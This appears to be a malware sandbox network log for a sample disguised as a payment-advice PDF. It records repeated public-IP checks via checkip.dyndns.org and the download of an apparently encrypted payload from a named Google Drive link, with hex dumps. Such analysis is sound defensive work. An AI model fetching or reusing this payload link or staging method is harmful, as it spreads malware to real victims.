                                                                                                                                  Dec 17, 2024 08:43:40.981745958 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:40 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: aa5212fcd57812a7ca875a1d5e4b254a
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449830158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:43.089665890 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:44.294574976 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:44 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: e4a2755bf4c4430947c8f738d006fee0
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.449838158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:46.416150093 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:47.623064995 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d9434e12e39df3aedf1d5a65841ff6f0
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.449849158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:49.729285002 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:50.932688951 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:50 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 69a3f4f6efde67c3de49efbfa67a48db
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.449858158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:53.080987930 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:54.284662962 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:54 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 087687ecaac818b9ae560fb792bd51ec
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.449867158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:56.405495882 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:57.631014109 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:57 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 42423a78c4beee9cdb89844593c9b10f
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.449877158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:59.790177107 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:00.996728897 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:00 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 3f2910cbb488c106f356d0cb01be6eae
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.449886158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:44:03.121478081 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:04.325215101 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 3ecdded5a93217f095b1c6781da97136
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.449896158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:44:06.529033899 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:07.736078024 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:07 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 37f96bfc0c3a097ee5a4c62839f24708
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.449905158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:44:09.929522038 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:11.265780926 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:11 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bb16afaab65b574180cec05f25fa897e
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.449915158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:44:13.462217093 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:14.697674990 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:14 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 46afb4761d362bcab99940e2ceac5892
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.449924158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:44:16.907413960 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:44:18.116226912 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:17 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 12d1d71794bccf129382eec9d70da69c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449736172.217.19.1744437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:42:57 UTC216OUTGET /uc?export=download&id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Host: drive.google.com
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  2024-12-17 07:42:58 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Tue, 17 Dec 2024 07:42:57 GMT
                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=download
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Content-Security-Policy: script-src 'nonce-yRrcy76AMC6IwfXCWWmCJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449737142.250.200.2254437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:00 UTC258OUTGET /download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=download HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:02 UTC4932INHTTP/1.1 200 OK
                                                                                                                                  X-GUploader-UploadID: AFiumC4_x0JHOLCwfhz90HHgjxhWR5w0BKhErRcxEyotAyieWSGTNENBZANXyq9LjN6Mav5q
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Content-Disposition: attachment; filename="VcVRUSCXK178.bin"
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 94272
                                                                                                                                  Last-Modified: Mon, 16 Dec 2024 21:06:37 GMT
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:02 GMT
                                                                                                                                  Expires: Tue, 17 Dec 2024 07:43:02 GMT
                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                  X-Goog-Hash: crc32c=AHfbPg==
                                                                                                                                  Server: UploadServer
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close
                                                                                                                                  2024-12-17 07:43:02 UTC4932INData Raw: 8d 83 6b fe af 31 0b 38 24 bf a1 8d 2a 41 29 23 fb ef 63 c0 27 87 dd 16 ba 72 6e 69 7d 33 b8 51 f6 60 39 10 f5 3a b9 15 51 cd ac 73 4f fc fb 24 d5 f9 5d de 8c 7e 29 2f aa 1e 6c 64 08 83 9f fc 75 e5 42 f9 8b 06 07 f3 83 b7 26 94 a4 41 7b 7e cd 7b f5 c5 f6 d9 fb e2 e5 8d be 81 a9 d4 3a d2 90 52 32 5f e9 03 ac d9 18 6e f3 f3 8a e7 2c 3a 81 5a c9 16 fa 3a d0 31 f2 a2 dd 33 35 a7 d0 b4 01 a9 8f 6e 60 c9 31 96 33 00 a5 fb 8a 75 e2 50 ff c3 a9 8d 90 c4 eb d3 58 f9 5e 96 71 c0 34 4a 4c 22 47 62 3c 35 e7 aa a5 d7 fb f4 71 f6 b9 d6 0b f1 4d dc a7 26 9b 51 fb f9 6a 81 4e d6 74 cb bb e6 6f ef e4 df 59 c5 5d 76 f8 8d 3c 1c c1 51 20 50 dc 97 10 9a f5 bc 56 ff 51 ae 80 39 5f 17 55 68 26 cb a9 6a 9b 22 2d 74 75 06 8d 47 d4 78 ea 66 03 e8 d0 af 8a 09 b5 d2 56 e2 66 73 0a
                                                                                                                                  Data Ascii: k18$*A)#c'rni}3Q`9:QsO$]~)/lduB&A{~{:R2_n,:Z:135n`13uPX^q4JL"Gb<5qM&QjNtoY]v<Q PVQ9_Uh&j"-tuGxfVfs
                                                                                                                                  2024-12-17 07:43:02 UTC4834INData Raw: 63 8e 86 c8 45 65 28 73 7d f8 2c 81 d9 7f d1 31 cd 4b 1e aa 86 92 f7 89 7d d0 71 27 f7 2d 1b f0 e3 04 bc 6d 9c 55 25 c1 b4 87 4a 28 ef d7 8f 97 a9 e8 7f eb 77 b1 ca 86 c2 e8 ab d4 51 20 2a 11 94 6f 72 1d 84 e1 16 21 d9 35 d3 90 5c 7c 04 fd ae 9d ec 35 58 98 0d 84 cd 25 4b 86 7d 2c cd 49 8a 6c f7 e2 99 0e 98 2c 6e 18 4b 2c b1 6c 2e ec fe 21 54 8e 5a 66 90 c6 42 40 7f f7 c5 44 c6 ce 84 8c 5d 9a 7f e7 ae c7 87 2e a5 f3 fe 85 d6 2c 6d 8f 2c a5 e7 ee 6f d2 ca 35 47 fc 7d 5e 72 3c e9 6a 34 62 a0 90 9f f1 9b d9 78 63 53 23 f6 e1 1b 1a 1f e4 fb 80 51 5e c4 e5 32 45 cb 95 81 4c bc 39 4d 95 e9 06 6f 03 d3 af 54 d2 2a 16 c8 81 a4 9a 7b 70 76 e7 29 0d 78 83 05 08 0d 70 d4 1a 21 a2 a1 68 34 93 e5 1d 53 3a 57 03 05 99 ab 88 ce a3 49 a5 56 13 76 6d 6a c9 b6 23 74 0b a3
                                                                                                                                  Data Ascii: cEe(s},1K}q'-mU%J(wQ *or!5\|5X%K},Il,nK,l.!TZfB@D].,m,o5G}^r<j4bxcS#Q^2EL9MoT*{pv)xp!h4S:WIVvmj#t
                                                                                                                                  2024-12-17 07:43:02 UTC1322INData Raw: 2f cd 47 92 ce f8 f4 95 d4 31 bc fc f4 1d d4 29 b9 8d 29 ed 10 df f9 6e a9 9c d6 74 c1 eb a1 6a 61 c1 a3 17 c5 ea 48 8f 3e 47 51 c1 51 24 78 0d 97 f0 90 8a f1 5d fe 05 ae 80 75 5e 17 55 73 16 c9 a9 f0 9b 22 f3 d5 74 06 9c 67 d6 03 ac c6 02 ec ae fc ca 09 bf da 02 e2 66 7b 00 0a 8c b6 67 b2 96 d1 ad 53 fe 02 3d 98 af 00 18 2c c1 7b d2 4a 23 b7 c0 04 2b a0 29 17 88 18 6b 04 48 17 4b 4a 64 af 60 d4 02 8f b9 0b ce 7d 99 26 55 ee bc 4b 6d 0b 7d 15 79 12 6b b1 83 a9 c6 cc c8 22 3e 4f aa a1 79 ab c5 22 65 de 8d 09 c1 9c 5d 1c f7 99 ba 25 dd 53 94 7e ef 8d d7 dc 32 e6 4c 7c e0 db 9d 9a 7f fe 6b 01 40 ea d4 2d de 8a c2 ec 64 42 69 c5 27 3d 09 84 e0 19 8a aa 0b ac 82 12 bc 5e 30 b0 18 57 17 47 43 d8 71 51 44 f2 d7 c0 54 de 5f d3 67 c8 96 cc af 6f 12 d3 46 20 a3 75
